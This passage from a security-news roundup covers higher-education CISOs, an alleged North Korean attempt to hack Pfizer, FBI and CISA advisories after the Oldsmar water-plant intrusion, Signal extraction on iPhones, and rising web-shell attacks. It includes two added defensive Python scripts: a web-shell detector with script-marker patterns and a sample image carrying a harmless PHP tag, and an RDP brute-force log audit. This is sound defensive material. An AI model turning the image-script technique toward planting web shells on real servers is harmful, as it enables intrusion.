“Diversity is a passion of mine,” comments Hudson. “It’s very important in higher education, but it’s also important for society in general.” There is evidence, he suggests, to show that when you intentionally leverage diversity of thought, race, religion, and gender, you get better solutions to problems. “When you can bring together diversity of background, diversity of thinking, diversity of approach you just get a view that is more dynamic than the myopic view of continuing to do things in the same old way.”
With women in cybersecurity, there is one fascinating statistic: the ratio of women to men CISOs is far higher than the general ratio of women to men engineers. This raises an interesting question: is there something in the female psyche that makes women particularly suited to security leadership?
Ohio’s Helen Patton thinks not – or at least not in such simple terms. “I’ve met female CISOs that I hugely respect, and I’ve met female CISOs I don’t; and I think that’s true for men as well. So, I’m hesitant to stereotype a class of people, male or female, as being more of this or less of that. I still look at the individual and the circumstance in which they work as being more important.”
But there is a proviso. “I think one thing that is a common experience for women in this profession is to be the outsider. You can’t help it; every conference you go to, every meeting you go to, you are the one or the two percent in the room if you are lucky. This forces you firstly to see things from a slightly different perspective and recognize that you’re seeing from a different perspective; and secondly to try to find a way to bridge back to whatever the common conventional wisdom is and to question it.”
For Patton, what women bring that is new is not from being a woman, but from being a minority. “I think there are skills that are honed when you are a minority candidate of any minority, that you are forced to hone just because of your experience. But sometimes in some organizations that’s a positive and sometimes that’s a negative and so it’s hard to generalize.”
Nevertheless, it supports Hudson’s view that diversity is a wider issue than just male/female, while succeeding from a minority background will require and hone Patton’s ‘emotional intelligence’.
Hierarchy, soft skills, compliance, and the higher education culture
The CISO’s need for, and use of, soft skills is a theme that recurs through this series. Usually it is in terms of bridging the gap between the official reporting structure and the reporting structure required to be efficient. Most CISOs believe that the modern CISO needs to be both a businessperson and a techie.
Businessperson or techie?
“I am both,” says Patton. She has a strong technical team around her, but relies on her own technical skills to understand and guide them. “My day-to-day job,” she adds, “is primarily exercising my business skills – everything from emotional intelligence to business planning, and organizational planning, strategic planning, legal compliance, and risk – that’s where I spend my time. It’s not arguing about firewall configurations and endpoint management tools.”
Sherry believes the balance depends upon the organization, particularly in terms of size. Small concerns may need a rock solid technical CISO who is more tactical than strategic. In larger concerns, so long as the technology is working, the CISO may need to be more strategic and businesslike; “But I do agree,” he adds, “that having the right balance between the two is probably best.”
For most top CISOs, influence over security policy matters more than formal position in the corporate, or in this case educational, hierarchy. Influence comes down to relationships, which come down to soft skills.
Hierarchy
The optimal position within the organization’s hierarchy is a continuous debate among CISOs. Surprisingly, most top CISOs are not too concerned, provided only that they can effect change where and when it is necessary. “I have two bosses,” comments Patton, “I report to the CIO who reports to the Provost who, in a non-higher ed environment, would be considered the Chief Operating Officer – and he reports to the President. So, through that lens, I am three layers down from the President. My other direct report is the Chief Compliance Officer who reports to the head of legal who reports to the Board. So, in that regard, I am two or three layers down from the Board.”
But, she continued, “It works. My philosophy on this is organizationally there is no pedantically correct answer to that question. It depends on the institution and whether or not you can be effective in the role you are in. Here, even though I am two or three levels down from the top of the tree, I get to have regular interaction with the top of the tree. I have bosses who allow me to speak freely. We are not overly hierarchical in terms of messaging in our organization.”
However – and this is important – she is philosophically opposed to the CISO reporting to the CIO. It works in her case, “My personal thoughts on this is if you take personalities out of the equation, it is not appropriate for the CISO to report to the CIO. But you can’t take personalities out of the equation so I think it can work, although I think, philosophically, it is not the preferred option.”
Sherry has a similar view. “The easiest answer to where the CISO should sit is where he or she can have the most influence – and that depends on the vertical and the organization. But I believe the CISO should sit in the IT structure. I report to the CIO, as do many other CISOs – but I believe the best situation is to be equal with the CIO reporting up to whoever the CIO reports to.” That time hasn’t yet come, but Sherry believes it must. Ideally, the CISO should control his own budget; or at least, like Sherry, have “a CIO who is extremely security-minded and security-conscious so I never have to worry about my budget being cut.”
Both Patton and Hudson have a proviso to these viewpoints. Hudson suggests that, “If you’re in a situation that is not a good fit for you, then you’re not in the right organization. You probably need to go to an organization that’s more the fit for the type of CISO you want to be.” Patton adds that the CISO must first try to change the situation so that it works. If that’s not possible, she says, “You don’t really have much of a choice but to look for something different.”
Soft skills
Hudson believes that soft skills are also necessary for the smooth running of the higher education culture. Here they are necessary to bridge the divide between strict compliance requirements and more relaxed student attitudes.
Compliance is an issue on its own. Some CISOs see it as a boon to security, some see it as a burden, and others see it as both. “It can be a boon in terms of possibly getting extra staff or technology or consulting dollars,” says Sherry; “or at least, shining a light on the need for it. But it can certainly be a burden when it’s just a litany of checkboxes on a checklist.”
Compliance is complex in higher education because each institution involves huge numbers of potentially vulnerable young people and spans many regulated areas, including healthcare, finance, intellectual property, physical security and more. While staff welfare can be largely handled by HR within traditional corporations, student welfare is subject to its own range of regulations. For this reason, Patton believes that the CISO must not be the compliance officer. “In the context of higher education, the CISO should absolutely not be the Compliance Officer,” she says. “I am the Compliance Officer as it relates to technology and risk. I play that role, but in a higher ed environment there are so many kinds of compliance – everything from sexual harassment to occupational health and safety, and to all those things. There is more to compliance in my world than just technology – there are many kinds of compliance that need to be considered. And for that purpose, I report to the Compliance Officer.”
Hudson’s view is complex – he fears the rigors of compliance can interfere with the culture of higher education. “It is probably one of the more challenging areas, for CISOs in general, but certainly for CISOs in higher ed,” he says. “There are two flavors of CISO. There’s the compliance-driven – I call that the Abominable No-man – who simply says ‘you must’, ‘you shall’, or ‘we have to do this’ – and I think you are going to be very frustrated if you are that kind of a CISO in higher ed. And then there’s the one that casts the wider net, the more strategic net; so, the balance is how do we meet our compliance requirements and not be seen as, or construed as, or be a barrier to what the institution is trying to accomplish. And that’s one of our more challenging issues.”
This is the second use of soft skills – being able to be legally compliant but not operationally obstructive.
It’s a challenge, but one of those fascinating challenges that has kept Hudson within the higher education sector. “I get to address issues around banking regulation, healthcare information, privacy regulations – regulations having to do with the student records and how we safeguard those. We’re a state agency so we have numerous state regulations. It makes for an interesting job, for sure. But the balance is, how do we fulfil those requirements and do it in a way that we don’t become a barrier, or be perceived as a barrier, to academic attainment and student success.”
The secret, he suggests, is for security to be frictionless. “My ideal is that information security should be happening behind the scenes. My users are aware of security, but are not slowed down by it. We place a high degree of importance on communication and awareness; so, when we roll out a technology that maybe causes a little bit of friction, people understand why it is necessary. They become part of the process. Then you can look at something like multi-factor authentication which requires an extra step in the process. But if we’ve done a good job, it doesn’t become friction, because they understand why we’re doing it and what’s happening behind it, what the benefit is to them.”
Advice
Recognizing and learning from good advice is an essential process in the development of strong leaders. For Helen Patton, the advice was an epiphany moment when she was told, ‘You’re right, but you’re not being effective.’ “Like a lot of security people and a lot of CISOs,” she said, “we pride ourselves on being smart and we pride ourselves on having a lot of data, and we leverage that data to pound our point forward. It was following a meeting when I was told this. Yes, I was accurate, and I was saying the correct thing; but my message was not getting across. It really made me step back and go ‘it’s not enough to be right – it does not mean people are going to act on your recommendations. You must win their heart and mind. Heart and mind – not just their mind.’ It’s all about influence and persuasion and, dare I say it, coercion and knowing when to apply those skills.”
David Sherry recalls advice he was given – some of which reflects the advice given to Helen Patton. “Speak with data,” he said, “but don’t speak in techie language. You must put the right data into the right context for businesspeople. They’re not interested that your firewall stopped 1.2 million suspicious requests last week, they’re only interested in the one or two that weren’t stopped.”
The other advice he took to heart was that, “Until you have earned trust and created relationships, be slow to speak and quick to listen. You have to find out what people want before you can offer solutions. You cannot suddenly appear like a knight in shining armor who’s going to solve world peace overnight.”
The advice Ed Hudson received came early in his career, when he still had a linear analytical approach to security and threats. He understood the security and threats of his time very well – but the reality is you don’t get caught by what you know, but by what you don’t know. “You have to be flexible,” he was told. “You have to be ready for contingencies – be flexible.”
That is the advice that Hudson offers to emerging security leaders. Patton, however, says, ‘know yourself and your team.’ “To be a leader in security, as an individual you’ve got to know yourself – but as a leader of a team you’ve also got to understand the boundaries of what your team is willing to do and what it’s not; where you’re willing to lead your team and where you’re not. ‘Know thyself’ is still probably for me the best advice for a budding leader.”
Sherry’s advice is to thoroughly understand the culture of your organization – which is probably different in higher education than in any other vertical sector. “When I was in the banking industry,” he comments, “I had the authority to say ‘thou shalt do this, and thou shalt not do that’ because I was protecting $250 billion of other people’s money. It’s not like that in higher education, where being the CISO is like being the CISO of a small city. I have a fire station, I have a police squad, a rescue squad, I have museums, public parks, parents, donors, visitors, athletic teams, sports boosters, as well as all the faculty staff and the students. And in all this I have to provide an environment that remains conducive to learning and academic exploration.”
Future threats
Unsurprisingly, given such a wide threat landscape, there is little agreement over the greatest coming threats to the sector. Sherry and Hudson are concerned with the more ‘traditional’ threats. Hudson sees them coming from the criminal use of artificial intelligence (AI). We’ve seen AI’s value in detecting threats, but we haven’t yet seen how it will inevitably be used in conducting cyber-attacks.
For Sherry, the threats come from the explosion of IoT devices. “Everything now seems to have some kind of chip in it, needs to have some firmware upgrade, needs to have some security mindset,” he said. “I’m not worried about the Microsofts and the Oracles and the PeopleSofts – I’m worried about the new light bulbs coming in, or the new security camera that’s going up. They may be fine for now, but 18 months down the line they could be attacking me because everything new now has its own IP address.”
Patton takes a completely different view. “I think our government regulations are probably the biggest threat to higher education,” she said. “The people giving advice to our governments and our regulators are big companies that are private industry profit driven. Most of higher ed is not private industry profit driven. There is a different purpose for higher education, particularly a research education institution, and the regulations that we are being asked to comply with often don’t align easily with higher ed. There is huge pressure on higher education to be cheaper. This is going to get worse as we have to reskill an awful lot of people whose jobs are going away because of the COVID-19 pandemic. We need to be cheaper and we need to be faster. That’s fine; but at the same time, we’ve got regulators who are coming in and imposing regulations on us that make us not cheap and not fast. We’re in conflict, and that’s really challenging.”
Sharing
Effective sharing of information on threats and solutions is something frequently urged but rarely achieved. This is not so in higher education – many of the leading institutions belong to an organization known as Educause, where the former CISO of Quinnipiac University, Brian Kelly, is director of the cybersecurity program.
“I am an avid supporter of Educause,” comments Ed Hudson. “It gives me a whole cadre of people to go to, who, if they haven’t already solved an issue, they’re solving it at the same time as I am trying to solve it.”
Apart from peer advice, Educause members also work on sector-specific security tools. “The group has done some great things when you look at the tools that we have developed, collaboratively, together within Educause. Things like the higher education information security community security maturity assessment tool (HESCSMAT) – a self-assessment tool that higher-ed organizations can use to help assess the maturity of their security program. And there’s the higher education cloud-vendor assessment tool (HECVAT) which allows us to assess the security posture of cloud vendors.”
For the moment, Educause within the higher education sector is unique – but it is perhaps a model that other sectors could emulate. “I think a lot of industry silos could benefit from this kind of approach,” continued Hudson. “It’s one of the challenges in cybersecurity – we haven’t always been good at sharing with each other. That’s not the case in higher ed. We’re ready to reach out to our brothers and sisters and say, ‘help me solve this’. I didn’t see that when I was in the private sector. There it’s one of those things where you hold your cards closer to the chest for all the understandable reasons. But I do think that the Educause approach would be really beneficial to other industry verticals.”
North Korea 'Tried to Hack' Pfizer for Vaccine Info - South's Spies: Reports
17.2.2021 BigBrothers Securityweek
North Korean hackers tried to break into the computer systems of pharmaceutical giant Pfizer in a search for information on a coronavirus vaccine and treatment technology, South Korea's spy agency said Tuesday, according to reports.
The impoverished, nuclear-armed North has been under self-imposed isolation since closing its borders in January last year to try to protect itself from the virus that first emerged in neighbouring China and has gone on to sweep the world, killing more than two million people.
Leader Kim Jong Un has repeatedly insisted that the country has had no coronavirus cases, although outside experts doubt those assertions.
And the closure has added to the pressure on its tottering economy from international sanctions imposed over its banned weapons systems, increasing the urgency for Pyongyang to find a way to deal with the disease.
Seoul's National Intelligence Service "briefed us that North Korea tried to obtain technology involving the Covid vaccine and treatment by using cyberwarfare to hack into Pfizer", MP Ha Tae-keung told reporters after a parliamentary hearing behind closed doors.
North Korea is known to operate an army of thousands of well-trained hackers who have attacked firms, institutions and researchers in the South and elsewhere.
Pfizer's coronavirus vaccine, developed jointly with Germany's BioNTech, began winning approval from authorities late last year.
It is based on technology that uses the synthetic version of a molecule called "messenger RNA" to hack into human cells and effectively turn them into vaccine-making factories.
Pfizer says it expects to potentially deliver up to 2 billion doses in 2021.
The company's South Korean office did not immediately respond to a request for comment by AFP.
Both it and BioNTech said in December that documents relating to their vaccine were "unlawfully accessed" during a cyberattack on a server at the European Medicines Agency, the EU's medicine regulator.
The comments came after the Amsterdam-based EMA said it had been the victim of a hacking attack, without specifying when it took place or whether its work on Covid-19 was targeted.
Cyber-heists
The allegations come only a week after a confidential UN report seen by AFP said North Korea had stolen more than $300 million worth of cryptocurrencies through cyberattacks in recent months to support its weapons programmes.
Financial institutions and exchanges were hacked to generate revenue for Pyongyang's nuclear and missile development, the document said, with the vast majority of the proceeds coming from two thefts late last year.
Pyongyang's cyberwarfare abilities first came to global prominence in 2014 when it was accused of hacking into Sony Pictures Entertainment as revenge for "The Interview", a satirical film that mocked leader Kim.
The attack resulted in the posting of several unreleased movies as well as a vast trove of confidential documents online.
The North is also accused of a huge, $81 million cyber-heist from the Bangladesh Central Bank, as well as the theft of $60 million from Taiwan's Far Eastern International Bank.
Pyongyang's hackers were blamed for the 2017 WannaCry global ransomware cyberattack, which infected some 300,000 computers in 150 nations, encrypting user files and demanding hundreds of dollars from their owners for the keys to get them back.
Pyongyang has denied the accusations, saying it has "nothing to do with cyber-attacks".
Nuclear talks between it and Washington have been stalled since a summit between Kim and then-president Donald Trump in February 2019 broke down over sanctions relief and what Pyongyang would be willing to give up in return.
North Korea showed off several new missiles at military parades in October and last month, when Kim pledged to strengthen his nuclear arsenal.
FBI’s alert warns about using Windows 7 and TeamViewer
15.2.2021 BigBrothers Securityaffairs
The FBI is warning companies about the use of out-of-date Windows 7 systems, desktop sharing software TeamViewer, and weak account passwords.
The FBI issued this week a Private Industry Notification (PIN) alert to warn companies about the risks of using out-of-date Windows 7 systems, poor account passwords, and the desktop sharing software TeamViewer.
The alert comes after the recent attack on the Oldsmar water treatment plant’s network, where attackers tried to raise levels of sodium hydroxide by a factor of more than 100. The investigation into the incident revealed that operators at the plant were using out-of-date Windows 7 systems and poor account passwords, and that the desktop sharing software TeamViewer was used by the attackers to breach the network of the plant.
“The attempt on Friday was thwarted. The hackers remotely gained access to a software program, named TeamViewer, on the computer of an employee at the facility for the town of Oldsmar to gain control of other systems, Sheriff Bob Gualtieri said in an interview,” Reuters reported.
The alert urges organizations to review internal networks and mitigate the risks posed by the above factors.
“Beyond its legitimate uses, TeamViewer allows cyber actors to exercise remote control over computer systems and drop files onto victim computers, making it functionally similar to Remote Access Trojans (RATs),” states the FBI’s PIN alert. “TeamViewer’s legitimate use, however, makes anomalous activity less suspicious to end users and system administrators compared to typical RATs.”
The FBI alert warns of the abuse of desktop sharing software like TeamViewer: threat actors can use it to access a target network once they have obtained the login credentials of its employees. Below are the recommendations provided by the alert:
TeamViewer Software Recommendations
For a more secure implementation of TeamViewer software:
Do not use unattended access features, such as “Start TeamViewer with Windows” and “Grant easy access.”
Configure the TeamViewer service to “manual start,” so that the application and associated background services are stopped when not in use.
Set random passwords to generate 10-character alphanumeric passwords.
If using personal passwords, utilize complex rotating passwords of varying lengths. Note: TeamViewer allows users to change connection passwords for each new session. If an end user chooses this option, never save connection passwords as an option, as they can be leveraged for persistence.
The FBI alert also warns of the risk of using the Windows 7 operating system, which reached end-of-life on January 14, 2020.
“Continued use of Windows 7 increases the risk of cyber actor exploitation of a computer system,” continues the alert. “Cyber actors continue to find entry points into legacy Windows operating systems and leverage Remote Desktop Protocol (RDP) exploits.”
The alert warns that cyber actors often use misconfigured or improperly secured RDP access controls to conduct cyber-attacks.
Below are the general recommendations provided by the FBI:
Update to the latest version of the operating system (e.g. Windows 10).
Use multiple-factor authentication.
Use strong passwords to protect Remote Desktop Protocol (RDP) credentials.
Ensure anti-virus, spam filters, and firewalls are up to date, properly configured and secure.
Audit network configurations and isolate computer systems that cannot be updated.
Audit your network for systems using RDP, closing unused RDP ports, applying multiple-factor authentication wherever possible, and logging RDP login attempts.
Audit logs for all remote connection protocols.
Train users to identify and report attempts at social engineering.
Identify and suspend access of users exhibiting unusual activity.
Court documents show FBI could use a tool to access private Signal messages on iPhones
14.2.2021 BigBrothers Securityaffairs
Court documents obtained by Forbes revealed that the FBI may have a tool that allows accessing private Signal messages on iPhones.
Court documents related to a recent gun-trafficking case in New York and obtained by Forbes revealed that the FBI may have a tool to access private Signal messages.
The documents revealed that encrypted messages can be intercepted from iPhone devices when they are in “partial AFU (after first unlock)” mode.
“The clues came via Seamus Hughes at the Program on Extremism at the George Washington University in court documents containing screenshots of Signal messages between men accused, in 2020, of running a gun trafficking operation in New York.” states Forbes. “There’s also some metadata in the screenshots, which indicates not only that Signal had been decrypted on the phone, but that the extraction was done in “partial AFU.” That latter acronym stands for “after first unlock” and describes an iPhone in a certain state: an iPhone that is locked but that has been unlocked once and not turned off.”
Some forensics security firms, such as Cellebrite and Grayshift/GrayKey, have developed platforms for the forensic investigation of mobile devices that allow the extraction of sensitive information. In December, the Israeli security firm Cellebrite claimed that it can decrypt messages from the highly secure Signal messaging app.
The tools exploit both software and hardware vulnerabilities to extract data from mobile devices.
Investigators could extract data from iPhone devices in partial AFU mode because the encryption keys are still held in memory in that state and can be accessed using specific forensic tools.
At the time of this writing, it is unclear which model of iPhone was accessed by the FBI, or which iOS version was running on the device.
“The iPhone in question appears to be either an iPhone 11 (whether Pro or Max) or a second generation iPhone SE. It’s unclear if the police can access private data on an iPhone 12. It’s also not clear what software version was on the device. Newer iOS models may have better security.” continues Forbes. “Apple declined to comment, but pointed Forbes to its response to previous research regarding searches of iPhones in AFU mode, in which it noted they required physical access and were costly to do.”
A Signal spokesperson told Forbes that someone in physical possession of a device can exploit an unpatched Apple or Google operating system vulnerability to partially or fully bypass the lock screen, and then interact with the device.
Microsoft warns of the rise of web shell attacks
13.2.2021 BigBrothers Securityaffairs
Researchers from Microsoft are warning that the number of monthly web shell attacks has doubled since last year.
Microsoft reported that the number of monthly web shell attacks has almost doubled since last year: its experts observed an average of 140,000 of these encounters on servers per month, compared with 77,000 in 2020.
“One year ago, we reported the steady increase in the use of web shells in attacks worldwide. The latest Microsoft 365 Defender data shows that this trend not only continued, it accelerated: every month from August 2020 to January 2021, we registered an average of 140,000 encounters of these threats on servers, almost double the 77,000 monthly average we saw last year.” reads the report published by Microsoft.
A web shell is code, often written in typical web development programming languages (e.g., ASP, PHP, JSP), that attackers implant on web servers to gain remote access and code execution.
The surge in the number of attacks involving web shells is attributed to their simplicity and efficiency.
The latest Microsoft 365 Defender data shows a growing trend since August 2020.
[Figure: monthly web shell attack encounters trend, from Microsoft 365 Defender data]
Microsoft also provided some tips on how to harden servers against attacks attempting to download and install a web shell.
The experts highlighted the challenges of detecting web shell attacks: these malicious scripts can be written in several languages and are difficult to detect because of their simplicity, and threat actors often use them for persistence or in the early stages of exploitation.
Web shells can also be hidden in non-executable file formats, such as media files.
“Web servers configured to execute server-side code create additional challenges for detecting web shells, because on a web server, a media file is scanned for server-side execution instructions. Attackers can hide web shell scripts within a photo and upload it to a web server.” continues the report. “When this file is loaded and analyzed on a workstation, the photo is harmless. But when a web browser asks a server for this file, malicious code executes server side.”
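As an added example (not code from Microsoft or from the report quoted above), the Python script below scans an upload directory for the mismatch the passage describes: a file whose name and header say it is an image but whose body carries a server-side script marker. The marker patterns, the image magic-byte table, the function names and the sample files are all constructed for this example.

```python
"""Flag uploaded "images" that carry server-side script markers.

Added example for the web-shell-in-a-photo case described in the Microsoft
report; not code from Microsoft. Markers, magic-byte table and samples are
constructed for illustration.
"""
import os
import re
import tempfile

# Opening tags a server configured to run server-side code would act on.
# This list is an assumption for the example; extend it for your own stack.
SCRIPT_MARKERS = {
    "php_open_tag": re.compile(rb"<\?(php|=)", re.IGNORECASE),
    "asp_jsp_open_tag": re.compile(rb"<%[=@!]?"),
    "php_script_tag": re.compile(rb"<script[^>]+language\s*=\s*['\"]?php",
                                 re.IGNORECASE),
}

# Magic bytes for the image types expected in an upload directory.
IMAGE_MAGIC = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
}


def find_script_markers(data: bytes) -> list:
    """Return the names of script markers found anywhere in the file body."""
    return [name for name, rx in SCRIPT_MARKERS.items() if rx.search(data)]


def analyze_upload(filename: str, data: bytes) -> dict:
    """Classify one file: script markers in the body, or magic bytes that
    do not match the claimed image extension, both make it suspicious."""
    reasons = []
    ext = os.path.splitext(filename)[1].lower()
    markers = find_script_markers(data)
    if markers:
        reasons.append("script markers: " + ", ".join(markers))
    if ext in IMAGE_MAGIC and not data.startswith(IMAGE_MAGIC[ext]):
        reasons.append(f"extension {ext} but magic bytes do not match")
    return {"file": filename, "suspicious": bool(reasons), "reasons": reasons}


def scan_directory(root: str) -> list:
    """Walk an upload tree and return the findings for suspicious files."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            result = analyze_upload(name, data)
            if result["suspicious"]:
                result["file"] = path
                findings.append(result)
    return findings


# Constructed samples, not real uploads. The "polyglot" is a valid JPEG
# header with a harmless PHP tag appended after the end-of-image marker.
CLEAN_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 64 + b"\xff\xd9"
POLYGLOT_JPEG = CLEAN_JPEG + b'<?php echo "marker"; ?>'
CLEAN_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
MISLABELED = b"GIF89a" + b"\x00" * 16   # will be stored under a .png name


def demo() -> list:
    """Write the constructed samples to a temp directory and scan it."""
    samples = {
        "photo.jpg": CLEAN_JPEG,
        "avatar.jpg": POLYGLOT_JPEG,
        "banner.png": CLEAN_PNG,
        "logo.png": MISLABELED,
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, data in samples.items():
            with open(os.path.join(tmp, name), "wb") as fh:
                fh.write(data)
        return scan_directory(tmp)


if __name__ == "__main__":
    for finding in demo():
        print(finding["file"], "->", "; ".join(finding["reasons"]))
```

The scan is a triage aid, not the fix: the hardening the report is pointing at is server configuration, i.e. never letting the web server execute anything from the directories it serves uploads from, so that a photo with a script tag inside it stays a photo.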
In April 2020, the U.S. NSA and the Australian Signals Directorate (ASD) issued a report to warn of attackers increasingly exploiting vulnerable web servers to deploy web shells.
The document provides valuable information on how to detect and prevent web shells from infecting the servers of the Department of Defense and other government agencies. The report could be useful for administrators that want to defend the servers in their networks from these threats.
The NSA has also released in its GitHub repository a collection of tools that can be used to prevent the deployment of web shells and to detect and block these threats.
U.S. Gov Warning on Water Supply Hack: Get Rid of Windows 7
13.2.2021 BigBrothers Securityweek
On the heels of last week’s lye-poisoning attack against a small water plant in Florida, the U.S. government’s cybersecurity agency is pleading with critical infrastructure defenders to rip-and-replace Windows 7 from their networks as a matter of urgency.
The government’s latest appeal, issued via a joint advisory from the Cybersecurity and Infrastructure Security Agency (CISA), comes amidst reports that the remote hack of the water plant near Tampa Bay was being blamed on poor password hygiene and attacks on systems running Microsoft’s out-of-service Windows 7 operating system. In addition to running Windows 7 on computers at the plant, all devices used the same password for remote access.
Microsoft ended support for Windows 7 more than a year ago but, as cybersecurity experts warn on a nonstop basis, the plants and factories that run critical infrastructure are very slow to migrate to newer operating systems.
This means that unless organizations purchase an Extended Security Update (ESU) plan from Microsoft, remote code execution vulnerabilities will remain unpatched. The ESU is a per-device plan available for Windows 7 Professional and Enterprise versions, with a price that increases the longer a customer continues to use it.
More ominously, Microsoft will only offer the ESU plan until January 2023, meaning that any tardy organization lagging with OS migration plans will be a sitting duck for dangerous hacker attacks.
“Continued use of Windows 7 increases the risk of cyber actor exploitation of a computer system. Cyber actors continue to find entry points into legacy Windows operating systems and leverage Remote Desktop Protocol (RDP) exploits,” the agency warned. “Since the end of July 2019, malicious RDP activity has increased with the development of a working commercial exploit for the vulnerability. Cyber actors often use misconfigured or improperly secured RDP access controls to conduct cyberattacks.”
In its bulletin, the agency all but confirmed public reports that the TeamViewer software was used to gain unauthorized access to the system. “The cyber actors likely accessed the system by exploiting cybersecurity weaknesses, including poor password security, and an outdated operating system,” the agency said, repeating urgent warnings that these present a perfect playbook and roadmap into sensitive networks.
As SecurityWeek previously reported, the hack was spotted on February 5th -- and neutralized -- in real time by staff at the plant that supplies water to Oldsmar, a small city close to Tampa, Florida.
Local law enforcement officials said an unknown adversary hacked into the plant remotely and attempted to elevate levels of sodium hydroxide by a factor of more than 100.
Sodium hydroxide, also known as lye, controls the acidity in potable water, but elevated levels maliciously added to the water supply can cause physical harm to the public.
The joint advisory contains specific mitigation recommendations to harden ICS/SCADA networks across the country. These include:
• Update to the latest version of the operating system (e.g. Windows 10).
• Use multiple-factor authentication.
• Use strong passwords to protect Remote Desktop Protocol (RDP) credentials.
• Ensure anti-virus, spam filters, and firewalls are up to date, properly configured and secure.
• Audit network configurations and isolate computer systems that cannot be updated.
• Audit your network for systems using RDP, closing unused RDP ports, applying multiple-factor authentication wherever possible, and logging RDP login attempts.
• Audit logs for all remote connection protocols.
• Train users to identify and report attempts at social engineering.
• Identify and suspend access of users exhibiting unusual activity.
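The FBI notification earlier on this page and the joint advisory above both recommend logging RDP login attempts and auditing logs for all remote connection protocols. As an added example (not code from the FBI or CISA), the Python below audits a constructed export of Windows Security log events for the patterns a defender would look for first: a burst of failed RDP logons from one source, an RDP logon from outside the expected management subnet, and a successful logon from a source that had just been failing. Event IDs 4624 (successful logon) and 4625 (failed logon) and logon type 10 (RemoteInteractive, i.e. RDP) are real Windows values; the events, the thresholds and the allowed subnet are assumptions made for this example.

```python
"""Audit RDP logon events from a Windows Security log export.

Added example for the "log RDP login attempts" recommendation; not code from
the FBI or CISA. Event IDs 4624/4625 and logon type 10 are real Windows
values; the sample rows, thresholds and allowed subnet are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import NamedTuple


class LogonEvent(NamedTuple):
    time: datetime
    event_id: int     # 4624 = successful logon, 4625 = failed logon
    account: str
    source_ip: str
    logon_type: int   # 10 = RemoteInteractive (RDP)


RDP_LOGON_TYPE = 10
FAILURE_THRESHOLD = 5            # this many failures from one source ...
WINDOW = timedelta(minutes=10)   # ... inside this window is a brute-force burst
# Assumption: only the management subnet should ever reach RDP.
ALLOWED_PREFIXES = ("192.168.10.",)

# Constructed export: (iso_time, event_id, account, source_ip, logon_type).
SAMPLE_ROWS = [
    ("2021-02-05T02:11:03", 4625, "operator", "203.0.113.7", 10),
    ("2021-02-05T02:11:09", 4625, "operator", "203.0.113.7", 10),
    ("2021-02-05T02:11:15", 4625, "operator", "203.0.113.7", 10),
    ("2021-02-05T02:11:22", 4625, "operator", "203.0.113.7", 10),
    ("2021-02-05T02:11:30", 4625, "operator", "203.0.113.7", 10),
    ("2021-02-05T02:11:41", 4625, "operator", "203.0.113.7", 10),
    ("2021-02-05T02:12:05", 4624, "operator", "203.0.113.7", 10),
    ("2021-02-05T09:30:00", 4624, "operator", "192.168.10.5", 10),
    ("2021-02-05T09:31:00", 4624, "svc_backup", "192.168.10.5", 5),
    ("2021-02-05T14:00:12", 4625, "admin", "198.51.100.4", 10),
]


def parse_events(rows):
    """Turn export rows into LogonEvent records sorted by time."""
    events = [LogonEvent(datetime.fromisoformat(t), eid, acct, ip, lt)
              for t, eid, acct, ip, lt in rows]
    return sorted(events, key=lambda e: e.time)


def rdp_events(events):
    """Keep only RDP (RemoteInteractive) logon events."""
    return [e for e in events if e.logon_type == RDP_LOGON_TYPE]


def brute_force_sources(events, threshold=FAILURE_THRESHOLD, window=WINDOW):
    """Source IPs with at least `threshold` failed RDP logons in any window."""
    failures = defaultdict(list)
    for e in rdp_events(events):
        if e.event_id == 4625:
            failures[e.source_ip].append(e.time)
    flagged = set()
    for ip, times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):        # sliding window over the failures
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged.add(ip)
                break
    return flagged


def external_rdp_logons(events, allowed=ALLOWED_PREFIXES):
    """Successful RDP logons from outside the allowed subnet(s)."""
    return [e for e in rdp_events(events)
            if e.event_id == 4624 and not e.source_ip.startswith(allowed)]


def logons_after_brute_force(events, **kw):
    """Successful RDP logons from a source that was already brute-forcing."""
    flagged = brute_force_sources(events, **kw)
    return [e for e in rdp_events(events)
            if e.event_id == 4624 and e.source_ip in flagged]


def audit(rows):
    """Run all three checks over an export and return a plain summary."""
    events = parse_events(rows)
    summarize = lambda es: [(e.time.isoformat(), e.account, e.source_ip) for e in es]
    return {
        "brute_force_sources": sorted(brute_force_sources(events)),
        "external_rdp_logons": summarize(external_rdp_logons(events)),
        "logons_after_brute_force": summarize(logons_after_brute_force(events)),
    }


if __name__ == "__main__":
    for check, hits in audit(SAMPLE_ROWS).items():
        print(f"{check}: {hits}")
```

The third check is the one that matters for the "suspend access of users exhibiting unusual activity" item: a success that follows a burst of failures from the same source is the moment a password guess landed, and the account and source in that record are what an operator would disable and block.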
In addition to ditching Windows 7, the agency urged network defenders to lock down TeamViewer desktop-sharing software and ensure proper password hygiene and rules are employed.
Industry Reactions to U.S. Water Plant Hack: Feedback Friday
13.2.2021 BigBrothers Securityweek
The U.S. government revealed this week that unknown hackers had managed to remotely access systems at a Florida city’s water plant and attempted to elevate levels of a certain chemical to a point where it would put the public at risk of being poisoned.
The attack, which targeted the water supply in Oldsmar, a small city in Florida, was discovered by staff at the plant — they noticed the mouse moving on the screen — and they rushed to take action before any damage was caused.
The attackers breached the facility via TeamViewer, which staff had been using to monitor systems remotely and respond to issues related to the water treatment process. The computers at the plant were running Windows 7 and all devices used the same password for remote access. Computers were remotely accessible from the internet and were not protected with firewalls, making it easier for the hackers to gain access.
Industry professionals have commented on various aspects of the breach, including implications and the measures organizations should take to prevent such incidents.
Daniel Kapellmann Zafra, Manager of Analysis, Mandiant Threat Intelligence:
